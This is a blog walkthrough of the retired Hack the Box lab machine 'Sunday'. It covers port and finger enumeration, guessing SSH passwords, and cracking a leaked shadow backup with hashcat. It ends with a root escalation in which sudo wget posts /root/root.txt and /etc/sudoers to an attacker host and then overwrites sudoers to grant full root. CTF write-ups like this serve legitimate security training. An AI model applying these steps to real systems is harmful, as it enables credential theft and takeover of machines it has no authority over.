Capture the flag (CTF)

Hack the Box (HTB) machines walkthrough series — Sunday

Security Ninja
April 29, 2019 by
Security Ninja

Today, we will be continuing with our exploration of Hack the Box (HTB) machines as begun in the previous article. This walkthrough is of an HTB machine named Sunday.

What should you learn next?

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

HTB is an excellent platform that hosts machines belonging to multiple OSes. It also has some other challenges as well. Individuals have to solve the puzzle (simple enumeration plus pentest)  in order to log into the platform and download the VPN pack to connect to the machines hosted on the HTB platform.

Note: Only write-ups of retired HTB machines are allowed. The machine in this article, named Sunday, is retired.

The Walkthrough

Let’s start with this machine.

1. Download the VPN pack for the individual user and use the guidelines to log into the HTB VPN.

2. The “Sunday” machine IP is 10.10.10.76.

3. We will adopt the same methodology of performing penetration testing as we have used previously. Let’s start with enumeration in order to learn as much information about the machine as possible.

4. As usual, let’s start with the nmap scan to gather more information about the services running on this machine. [CLICK IMAGES TO ENLARGE]
<<nmap -sC -sV -oA Sunday 10.10.10.76>>

5. We got some juicy information such as finger service, but some common ports such as SSH and HTTP are missing. To make sure we do not miss out on ports, let’s use SPARTA to find out other ports as well.

6. Make sure an Nmap staged scan is selected in SPARTA. As we can see, SPARTA was able to find SSH service on port 22022.

7. Let’s confirm that with Nmap as well.
<<nmap -sC -sV -p 22022 10.10.10.76 >>

8. OK, so if we get the username from finger, we can then try to log into the box.

9. As we can see using finger on the box, it says that no user is logged on.
<<finger @10.10.10.76>>

10. To dig more into this box, we can use the enumeration script found here.
Perl scipt.pl -t 10.10.10.76 -U /usr/share/wordlists/rockyou,txt

11. As we can see, we’ve gotten two possible users: Sunny and Sammy.

12. We can confirm these users with finger as well.

<<finger sunny@10.10.10.76>>

<<finger sammy@10.10.10.76>>

13. Now it’s time to extract the password as well. I tried looking everywhere in the box but couldn’t find any password. So my last resort is to guess the password. I tried the following combinations: sunny/root, sunny/admin, sunny/sunny, sunny/sammy, sunny/sunday and sammy/root, sammy/admin, sammy/sammy, sammy/sunny and sammy/sunday.

14. Out of the above combinations, sunny/sunday worked and now I can log into the box.
Ssh sunny@10.10.10.76 -p 22022

15. There is no user.txt available for this user.

16. Looking into sudo permissions, sunny user can run the /root/troll file. Below is an example.

<<sudo -l>>

<<sudo /root/troll>>

17. Browsing more into Sunny, we can see there is a backup directory which contains the agent22 and shadow.backup file
<<ls -la>>

18. Looking into the shadow.backup file reveals the contents of sammy and sunny.

19. Let’s see what category of hashes these are under Hashcat. As we can see below, these belong to SHA256 and method 7400.

20. Now we’re copying the hashes into a file: htb.hashes.

21. Running hashcat on the collected hashes like below:
Hashcat -m 7400 htb.hash /usr/share/wordlists/rockyou.txt --force

22. As we can see, both passwords got a hit.

23. Logging into the system with Sammy and the discovered password as below:
<<ssh sammy@10.10.10.76 -p 22022>>

24. Capture the user.txt file:

Cd Desktop

Ls

Cat user.txt

25. Now let’s see what sudo permissions this user has on the system.
<<sudo -l>>

26. It looks like Sammy can run the wget utility as root.

27. We can use the wget --post-file parameter to post the contents of root.txt. Let’s see if that works. We spin up a Netcat listener on port 80 on our attacker machine.
<<sudo wget --post-file=/root/root.txt <attacker machine>>>

28. We can capture the flag that way, but let’s do something else with these elevated privileges to get a root shell on the box.

29. What if we post the /etc/sudoers file and make Sammy or Sunny execute anything as root? Let’s first see the contents of /etc/sudoers.
<<sudo wget --post-file=/etc/sudoers <attacker machine ip>>>

30. Copying the contents of /etc/sudoers into sudoers and changing the permissions of Sammy to ALL=(root) NOPASSWD: ALL as shown below.

31. Collecting this file and installing it as /etc/sudoers, since wget is running as root effectively.
<<sudo wget -O /etc/sudoers http://<attcker_ip:8000/sudoers>>>

32. Now we can see that with just one command, Sammy becomes root and take complete control of the box.

<<sudo su>>

<id>

This is an interesting box. The first step is to guess the user password, making sure to enumerate all the ports, then enumerating the system to collect user hashes. Finally, we use wget to change the property of sudoers.

What should you learn next?

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

We will continue this series with more, similarly interesting machines.

Security Ninja
Security Ninja